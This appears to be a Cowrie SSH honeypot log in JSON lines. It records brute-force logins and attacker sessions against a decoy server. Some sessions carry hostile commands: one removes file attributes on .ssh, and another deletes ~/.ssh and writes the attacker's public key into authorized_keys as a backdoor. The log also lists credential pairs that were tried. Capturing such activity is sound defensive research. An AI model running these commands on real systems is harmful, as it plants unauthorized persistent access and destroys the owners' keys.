{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:53:47.389926Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:53:47.390915Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:53:47.392232Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:47.637311Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:53:48.225107Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.225832Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.472220Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.473334Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.572322Z","src_ip":"152.32.129.236","session":"ced93130ba38"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":36942,"dst_ip":"1.2.3.4","dst_port":22,"session":"42961e9c1d0a","protocol":"ssh","message":"New connection: 152.32.129.236:36942 (1.2.3.4:22) [session: 42961e9c1d0a]","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.711380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.712467Z","src_ip":"152.32.129.236","session":"42961e9c1d0a"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":47350,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10b3846f523","protocol":"ssh","message":"New connection: 43.156.132.147:47350 (1.2.3.4:22) [session: d10b3846f523]","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.714727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.715333Z","src_ip":"43.156.132.147","session":"d10b3846f523"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:48.959085Z","src_ip":"43.156.132.147","session":"d10b3846f523"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:49.532248Z","src_ip":"152.32.129.236","session":"42961e9c1d0a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:53:49.977498Z","src_ip":"43.156.132.147","session":"d10b3846f523"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:53:50.366980Z","src_ip":"152.32.129.236","session":"42961e9c1d0a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:50.567095Z","src_ip":"152.32.129.236","session":"42961e9c1d0a"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:50.625416Z","src_ip":"152.32.129.236","session":"dd5e49f56f9c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:51.223856Z","src_ip":"43.156.132.147","session":"d10b3846f523"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":47352,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3d8d8c01484","protocol":"ssh","message":"New connection: 43.156.132.147:47352 (1.2.3.4:22) [session: e3d8d8c01484]","sensor":"my-vps","timestamp":"2025-09-09T00:53:51.470385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:51.471352Z","src_ip":"43.156.132.147","session":"e3d8d8c01484"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:53:51.718594Z","src_ip":"43.156.132.147","session":"e3d8d8c01484"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:53:52.747735Z","src_ip":"43.156.132.147","session":"e3d8d8c01484"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:52.996937Z","src_ip":"43.156.132.147","session":"b2a63b1673b3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:52.997861Z","src_ip":"43.156.132.147","session":"e3d8d8c01484"}
{"eventid":"cowrie.session.connect","src_ip":"206.189.226.187","src_port":42614,"dst_ip":"1.2.3.4","dst_port":22,"session":"624a7face236","protocol":"ssh","message":"New connection: 206.189.226.187:42614 (1.2.3.4:22) [session: 624a7face236]","sensor":"my-vps","timestamp":"2025-09-09T00:53:56.941920Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:56.942747Z","src_ip":"206.189.226.187","session":"624a7face236"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:56.943613Z","src_ip":"206.189.226.187","session":"624a7face236"}
{"eventid":"cowrie.session.connect","src_ip":"206.189.226.187","src_port":42628,"dst_ip":"1.2.3.4","dst_port":22,"session":"e31e734be205","protocol":"ssh","message":"New connection: 206.189.226.187:42628 (1.2.3.4:22) [session: e31e734be205]","sensor":"my-vps","timestamp":"2025-09-09T00:53:57.131092Z"}
{"eventid":"cowrie.client.version","version":"GET /favicon.ico HTTP/1.1","message":"Remote SSH version: GET /favicon.ico HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T00:53:57.132324Z","src_ip":"206.189.226.187","session":"e31e734be205"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:53:57.133279Z","src_ip":"206.189.226.187","session":"e31e734be205"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":33475,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c8ef7ba0268","protocol":"ssh","message":"New connection: 103.100.209.195:33475 (1.2.3.4:22) [session: 9c8ef7ba0268]","sensor":"my-vps","timestamp":"2025-09-09T00:54:32.087008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:54:32.094307Z","src_ip":"103.100.209.195","session":"9c8ef7ba0268"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:54:32.296926Z","src_ip":"103.100.209.195","session":"9c8ef7ba0268"}
{"eventid":"cowrie.login.failed","username":"factory","password":"!","message":"login attempt [factory/!] failed","sensor":"my-vps","timestamp":"2025-09-09T00:54:33.103175Z","src_ip":"103.100.209.195","session":"9c8ef7ba0268"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:54:34.309692Z","src_ip":"103.100.209.195","session":"9c8ef7ba0268"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":33438,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce31761f82d7","protocol":"ssh","message":"New connection: 43.156.132.147:33438 (1.2.3.4:22) [session: ce31761f82d7]","sensor":"my-vps","timestamp":"2025-09-09T00:54:57.589627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:54:57.590798Z","src_ip":"43.156.132.147","session":"ce31761f82d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:54:57.839813Z","src_ip":"43.156.132.147","session":"ce31761f82d7"}
{"eventid":"cowrie.login.failed","username":"dokku","password":"dokku","message":"login attempt [dokku/dokku] failed","sensor":"my-vps","timestamp":"2025-09-09T00:54:58.875641Z","src_ip":"43.156.132.147","session":"ce31761f82d7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:55:00.127070Z","src_ip":"43.156.132.147","session":"ce31761f82d7"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":38562,"dst_ip":"1.2.3.4","dst_port":22,"session":"43dff80ef6d4","protocol":"ssh","message":"New connection: 152.32.129.236:38562 (1.2.3.4:22) [session: 43dff80ef6d4]","sensor":"my-vps","timestamp":"2025-09-09T00:55:03.339627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:55:03.340685Z","src_ip":"152.32.129.236","session":"43dff80ef6d4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:55:04.344521Z","src_ip":"152.32.129.236","session":"43dff80ef6d4"}
{"eventid":"cowrie.login.failed","username":"web","password":"1234567890","message":"login attempt [web/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T00:55:05.419284Z","src_ip":"152.32.129.236","session":"43dff80ef6d4"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:55:06.681062Z","src_ip":"152.32.129.236","session":"43dff80ef6d4"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":46423,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3becb596350","protocol":"ssh","message":"New connection: 103.100.209.195:46423 (1.2.3.4:22) [session: b3becb596350]","sensor":"my-vps","timestamp":"2025-09-09T00:55:39.585917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:55:39.592995Z","src_ip":"103.100.209.195","session":"b3becb596350"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:55:39.790936Z","src_ip":"103.100.209.195","session":"b3becb596350"}
{"eventid":"cowrie.login.failed","username":"web","password":"1234567890","message":"login attempt [web/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T00:55:40.590022Z","src_ip":"103.100.209.195","session":"b3becb596350"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:55:41.791783Z","src_ip":"103.100.209.195","session":"b3becb596350"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":55398,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d12ae8b44d8","protocol":"ssh","message":"New connection: 5.202.105.236:55398 (1.2.3.4:22) [session: 9d12ae8b44d8]","sensor":"my-vps","timestamp":"2025-09-09T00:56:06.241545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:06.245274Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:06.399334Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx#EDC","message":"login attempt [root/!QAZ2wsx#EDC] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:56:06.979050Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:56:07.337230Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:56:07.338013Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:56:07.338793Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
